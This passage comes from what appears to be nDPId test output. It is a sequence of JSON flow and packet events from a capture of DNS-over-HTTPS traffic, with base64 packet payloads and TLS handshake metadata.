dYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK
+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORc
VLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/I
Dh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6
Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} 
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3C
r0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDG